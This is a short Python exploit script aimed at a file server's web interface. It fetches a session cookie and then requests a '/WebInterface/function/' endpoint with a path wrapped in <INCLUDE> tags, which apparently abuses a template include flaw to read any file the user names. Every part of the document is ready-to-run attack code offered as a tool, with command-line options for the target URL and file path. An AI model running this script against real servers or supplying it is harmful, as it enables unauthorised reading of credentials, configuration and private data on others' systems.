exploit.py

import requests
import argparse

HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'

def get_cookies(url):
    try:
        session= requests.Session()
        session.get(url)
        session.cookies.get_dict()
        return session.cookies.get_dict()
    except:
        print(FAIL+"connection Error" +ENDC)
        quit()

def exploit(url,cookies,path):
    try:
        url= url + "/WebInterface/function/?command=zip&c2f="+cookies['currentAuth']+"&path=<INCLUDE>"+path+"</INCLUDE>&names=*"
        request=requests.get(url,cookies=cookies)
        return request.text
    except:
        print(FAIL+"connection Error"+ENDC)
        quit()

if __name__ == "__main__":

    parser = argparse.ArgumentParser()
    parser.add_argument("-u", "--url",help="URL of the target", required=True)
    parser.add_argument("-p", "--path",help="Path to the file to read", required=True)
    args = parser.parse_args()
    url =args.url
    path = args.path
    if not url.startswith("http"):
        print(WARNING+"URL should start with http or https"+ENDC)
        quit()
    cookies = get_cookies(url)
    if get_cookies(url)['currentAuth'] == None :
        print(WARNING+"Not vulnerable"+ENDC)
        quit()
    else:
        print(OKCYAN+exploit(url,cookies,path)+ENDC)